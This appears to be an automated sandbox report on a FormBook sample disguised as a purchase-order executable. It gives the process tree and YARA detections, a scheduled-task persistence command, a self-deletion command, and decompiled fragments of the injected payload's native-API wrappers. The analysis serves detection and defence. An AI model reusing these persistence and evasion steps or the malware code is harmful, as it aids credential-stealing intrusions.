                                  GetMessageAINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xEB

                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  Analysis Process: PO07262021.exe PID: 6688 Parent PID: 5924

                                  General

                                  Start time:18:51:52
                                  Start date:03/08/2021
                                  Path:C:\Users\user\Desktop\PO07262021.exe
                                  Wow64 process (32bit):true
                                  Commandline:'C:\Users\user\Desktop\PO07262021.exe'
                                  Imagebase:0x5e0000
                                  File size:978432 bytes
                                  MD5 hash:47A679EC6799A5A2C9212DE73D404A83
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET
                                  Reputation:low

                                  Chronological Activities

                                  Analysis Process: schtasks.exe PID: 960 Parent PID: 6688

                                  General

                                  Start time:18:52:18
                                  Start date:03/08/2021
                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                  Wow64 process (32bit):true
                                  Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\FzGSUpCvLNF' /XML 'C:\Users\user\AppData\Local\Temp\tmpB7D9.tmp'
                                  Imagebase:0x9d0000
                                  File size:185856 bytes
                                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Chronological Activities

                                  Analysis Process: conhost.exe PID: 2388 Parent PID: 960

                                  General

                                  Start time:18:52:18
                                  Start date:03/08/2021
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff724c50000
                                  File size:625664 bytes
                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Chronological Activities

                                  Analysis Process: PO07262021.exe PID: 4780 Parent PID: 6688

                                  General

                                  Start time:18:52:19
                                  Start date:03/08/2021
                                  Path:C:\Users\user\Desktop\PO07262021.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Users\user\Desktop\PO07262021.exe
                                  Imagebase:0x6a0000
                                  File size:978432 bytes
                                  MD5 hash:47A679EC6799A5A2C9212DE73D404A83
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.767554983.0000000001150000.00000040.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.767554983.0000000001150000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.767554983.0000000001150000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.767309184.0000000000D00000.00000040.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.767309184.0000000000D00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.767309184.0000000000D00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  Reputation:low

                                  Chronological Activities

                                  Analysis Process: explorer.exe PID: 3424 Parent PID: 4780

                                  General

                                  Start time:18:52:21
                                  Start date:03/08/2021
                                  Path:C:\Windows\explorer.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\Explorer.EXE
                                  Imagebase:0x7ff6fee60000
                                  File size:3933184 bytes
                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Chronological Activities

                                  Analysis Process: cmd.exe PID: 7024 Parent PID: 3424

                                  General

                                  Start time:18:52:47
                                  Start date:03/08/2021
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\cmd.exe
                                  Imagebase:0x11d0000
                                  File size:232960 bytes
                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.912674126.0000000003A00000.00000004.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.912674126.0000000003A00000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.912674126.0000000003A00000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.912452970.00000000033D0000.00000040.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.912452970.00000000033D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.912452970.00000000033D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.911713317.0000000001050000.00000040.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.911713317.0000000001050000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.911713317.0000000001050000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  Reputation:high

                                  Chronological Activities

                                  Analysis Process: cmd.exe PID: 6808 Parent PID: 7024

                                  General

                                  Start time:18:52:51
                                  Start date:03/08/2021
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):true
                                  Commandline:/c del 'C:\Users\user\Desktop\PO07262021.exe'
                                  Imagebase:0x11d0000
                                  File size:232960 bytes
                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Chronological Activities

                                  Analysis Process: conhost.exe PID: 6812 Parent PID: 6808

                                  General

                                  Start time:18:52:52
                                  Start date:03/08/2021
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff724c50000
                                  File size:625664 bytes
                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Chronological Activities

                                  Disassembly

                                  Code Analysis

                                  Reset < >

                                    Analysis Process: PO07262021.exe PID: 4780 Parent PID: 6688 PO07262021.exeCOMMON

                                    Executed Functions

                                    Function 00419E10, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 37%
                                    			E00419E10(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041A960(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d42
				_t12 =  &_a8; // 0x414d42
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}






                                    0x00419e13
                                    0x00419e1f
                                    0x00419e27
                                    0x00419e32
                                    0x00419e4d
                                    0x00419e55
                                    0x00419e59

                                    APIs
                                    • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: FileRead
                                    • String ID: BMA$BMA
                                    • API String ID: 2738559852-2163208940
                                    • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                    • Instruction ID: bd248b349f18b2ced93d1e709abaf342431bbeaaaaa26160fd0c904447d41470
                                    • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                    • Instruction Fuzzy Hash: 45F0B7B2210208AFCB14DF89DC81EEB77ADEF8C754F158649BE1DA7241D630E851CBA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040ACD0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E0040ACD0(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041C650( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041CA70(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041CCF0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041AEA0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                    0x0040acec
                                    0x0040acef
                                    0x0040acf4
                                    0x0040acf9
                                    0x0040ad03
                                    0x0040ad08
                                    0x0040ad0b
                                    0x0040ad0d
                                    0x0040ad15
                                    0x0040ad1a
                                    0x0040ad1a
                                    0x0040ad21
                                    0x0040ad29
                                    0x0040ad2c
                                    0x0040ad2e
                                    0x0040ad42
                                    0x00000000
                                    0x0040ad44
                                    0x0040ad4a
                                    0x0040acfe
                                    0x0040acfe
                                    0x0040acfe

                                    APIs
                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Load
                                    • String ID:
                                    • API String ID: 2234796835-0
                                    • Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                    • Instruction ID: b21dceb9c17b581325113e7f9749888d8b8163c3e846858d6705abbd9991eecb
                                    • Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                    • Instruction Fuzzy Hash: A8015EB5D4020DBBDF10DBA5DC82FDEB3789F54308F0041AAE909A7281F635EB548B96
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00419D60, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00419D60(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041A960(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                    0x00419d6f
                                    0x00419d77
                                    0x00419dad
                                    0x00419db1

                                    APIs
                                    • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID:
                                    • API String ID: 823142352-0
                                    • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                    • Instruction ID: 5d405ca8330a7760d33d8cb8f94c0e61ce0ec213ce21d6c827413d184fac496c
                                    • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                    • Instruction Fuzzy Hash: F1F0B2B2211208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00419F3D, Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 58%
                                    			E00419F3D(void* __esi, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;
				void* _t23;

				asm("sahf");
				_t23 = __esi - 1;
				asm("bound edx, [ebp-0x75]");
				_t10 = _a4;
				_push(_t23);
				_t3 = _t10 + 0xc60; // 0xca0
				E0041A960(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}






                                    0x00419f3d
                                    0x00419f3e
                                    0x00419f3f
                                    0x00419f43
                                    0x00419f49
                                    0x00419f4f
                                    0x00419f57
                                    0x00419f79
                                    0x00419f7d

                                    APIs
                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateMemoryVirtual
                                    • String ID:
                                    • API String ID: 2167126740-0
                                    • Opcode ID: 44dce4d8f103a1bb05541fda40fb060d061afbbcf12622fc381b718d3bd4a52b
                                    • Instruction ID: d22d610a35ca842bad4bd6b04a53a43eb7d3f2b7cd9f36f61fe91b52971cd172
                                    • Opcode Fuzzy Hash: 44dce4d8f103a1bb05541fda40fb060d061afbbcf12622fc381b718d3bd4a52b
                                    • Instruction Fuzzy Hash: CDF015B2200118AFCB24DF99DC81FEB77A9EF88754F158649FE0DA7241C631E811CBA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00419F40, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00419F40(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041A960(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                    0x00419f4f
                                    0x00419f57
                                    0x00419f79
                                    0x00419f7d

                                    APIs
                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateMemoryVirtual
                                    • String ID:
                                    • API String ID: 2167126740-0
                                    • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                    • Instruction ID: 9c08e1581e5817f7e91e4b21b7a397560e598f802d56d9274a49c90b7c070efe
                                    • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                    • Instruction Fuzzy Hash: 1EF015B2210208ABCB14DF89CC81EEB77ADEF88754F158549BE08A7241C630F810CBA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00419E8B, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00419E8B(void* __eax, char __esi, intOrPtr _a5, void* _a9) {
				char _v326413024;
				long _t12;
				void* _t15;

				_v326413024 = __esi;
				_t9 = _a5;
				_t4 = _t9 + 0x10; // 0x300
				_t5 = _t9 + 0xc50; // 0x40a923
				E0041A960(_t15, _a5, _t5,  *_t4, 0, 0x2c);
				_t12 = NtClose(_a9); // executed
				return _t12;
			}






                                    0x00419e8d
                                    0x00419e93
                                    0x00419e96
                                    0x00419e9f
                                    0x00419ea7
                                    0x00419eb5
                                    0x00419eb9

                                    APIs
                                    • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Close
                                    • String ID:
                                    • API String ID: 3535843008-0
                                    • Opcode ID: 12fb44da4ece222cd7cf5062b9a4e8412d7da0c5aa7e374be48854551b2b3194
                                    • Instruction ID: 1e23121321d436908872def38a796d47f21cbb90d95c636409b18545e6569a7f
                                    • Opcode Fuzzy Hash: 12fb44da4ece222cd7cf5062b9a4e8412d7da0c5aa7e374be48854551b2b3194
                                    • Instruction Fuzzy Hash: A6E0C272241214AFE710EF98CC85FEB7B68EF44760F054489BA4DAB242C230F610C7E0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00419E90, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00419E90(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a923
				E0041A960(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                    0x00419e93
                                    0x00419e96
                                    0x00419e9f
                                    0x00419ea7
                                    0x00419eb5
                                    0x00419eb9

                                    APIs
                                    • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Close
                                    • String ID:
                                    • API String ID: 3535843008-0
                                    • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                    • Instruction ID: e68336ecf97fcbff1cce52d5eab911d0c0d253976a6ab71543f56f2ca0e2158f
                                    • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                    • Instruction Fuzzy Hash: 6CD012752002146BD710EB99CC85ED7776CEF44760F154459BA5C5B242C530F55086E0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00409A90, Relevance: .1, Instructions: 92COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 93%
                                    			E00409A90(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* __ebx;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00407E80(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00408090( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041B810( &_v284, 0x104);
						E0041BE80( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00414DC0(E00414D60(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe045
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E004080C0(_t39,  &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E00408140(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}




















                                    0x00409a9b
                                    0x00409aa3
                                    0x00409aa5
                                    0x00409aaa
                                    0x00409aaf
                                    0x00409ac2
                                    0x00409ac7
                                    0x00409ad0
                                    0x00409adc
                                    0x00409aef
                                    0x00409af4
                                    0x00409af7
                                    0x00409b00
                                    0x00409b12
                                    0x00409b17
                                    0x00409b1c
                                    0x00000000
                                    0x00000000
                                    0x00409b1e
                                    0x00409b22
                                    0x00000000
                                    0x00000000
                                    0x00409b24
                                    0x00000000
                                    0x00409b22
                                    0x00409b26
                                    0x00409b29
                                    0x00409b2f
                                    0x00409b31
                                    0x00409b3c
                                    0x00409b41
                                    0x00409b44
                                    0x00409b51
                                    0x00409b5c
                                    0x00409b5e
                                    0x00409b64
                                    0x00409b68
                                    0x00409b6b
                                    0x00409b6b
                                    0x00409b72
                                    0x00409b75
                                    0x00409b7a
                                    0x00409b87
                                    0x00409ab6
                                    0x00409ab6
                                    0x00409ab6

                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
                                    • Instruction ID: 3804b4b6881f0f279124858c5e35b72bf87e4fbc11d5a75f000cd7e24852ad46
                                    • Opcode Fuzzy Hash: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
                                    • Instruction Fuzzy Hash: 64213CB2D4020857CB25D664AD42AEF737CEB54308F04017FE949A3182F7387E49CBA5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041A067, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25memoryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E0041A067(intOrPtr __eax, void* __eflags, intOrPtr _a4, void* _a12, long _a16) {
				char _t9;
				void* _t15;
				void* _t17;

				if(__eflags == 0) {
					 *0xec8b5530 = __eax;
					_t10 = _a4;
					_t3 = _t10 + 0xc74; // 0xc74
					_t18 = _t3;
					E0041A960(_t17, _a4, _t3,  *((intOrPtr*)(_t10 + 0x10)), 0, 0x35);
					_t15 = _a16;
				}
				_t9 = RtlFreeHeap(_a12, _a16, _t15); // executed
				return _t9;
			}






                                    0x0041a06c
                                    0x0041a06e
                                    0x0041a073
                                    0x0041a07f
                                    0x0041a07f
                                    0x0041a087
                                    0x0041a08c
                                    0x0041a08c
                                    0x0041a09d
                                    0x0041a0a1

                                    APIs
                                    • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: FreeHeap
                                    • String ID: Ukd
                                    • API String ID: 3298025750-2382297600
                                    • Opcode ID: ec24bde291b6ad464adcdb50130f4bda6930ed8808469c3f4dfce471ef00cb6c
                                    • Instruction ID: d689676709317b0cd726bbab9a02c7192788ce222ed2939e8bbab83abd96c339
                                    • Opcode Fuzzy Hash: ec24bde291b6ad464adcdb50130f4bda6930ed8808469c3f4dfce471ef00cb6c
                                    • Instruction Fuzzy Hash: 17E092B1210204AFC714DF55CC84EE73769EF48354F018559FA4C9B242D630E850CBB5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004082E9, Relevance: 1.6, APIs: 1, Instructions: 63threadwindowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: MessagePostThread
                                    • String ID:
                                    • API String ID: 1836367815-0
                                    • Opcode ID: 4436445960d6b768d03cdf9b199d2167bdef5ca9ce6cfb58ca29136606f4c6b3
                                    • Instruction ID: ec822e08bd155dd831358367c40661d08e2b05ebccaf957fece034a197ef1367
                                    • Opcode Fuzzy Hash: 4436445960d6b768d03cdf9b199d2167bdef5ca9ce6cfb58ca29136606f4c6b3
                                    • Instruction Fuzzy Hash: 8A110831A803283BE711A6A49C43FFE77186B41B15F04416EFE44BA1C2E7A9691547EA
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: MessagePostThread
                                    • String ID:
                                    • API String ID: 1836367815-0
                                    • Opcode ID: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
                                    • Instruction ID: 99221eaed4bb2b1c73ef210b546efabe7985b039c1aa6a3efaa8447a865c7254
                                    • Opcode Fuzzy Hash: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
                                    • Instruction Fuzzy Hash: 7601D831A8031876E720A6959C43FFE772C6B40F54F044019FF04BA1C1D6A8691646EA
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004082B3, Relevance: 1.6, APIs: 1, Instructions: 53threadwindowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: MessagePostThread
                                    • String ID:
                                    • API String ID: 1836367815-0
                                    • Opcode ID: bc231c21131fd6e342cb88e3cbb9e45536033cfa3dac4662433a0532ec60316f
                                    • Instruction ID: 53f23f0dc1f72444cf768b3ce00ffefc2e79a589de65a1fc048b088fafd0bec0
                                    • Opcode Fuzzy Hash: bc231c21131fd6e342cb88e3cbb9e45536033cfa3dac4662433a0532ec60316f
                                    • Instruction Fuzzy Hash: 1A01F932A4022437E63065656C03FFB6748AB80B55F09406FFE44FA6C2DABDA91546FA
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041A205, Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                    Download Yara Rule
                                    APIs
                                    • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: LookupPrivilegeValue
                                    • String ID:
                                    • API String ID: 3899507212-0
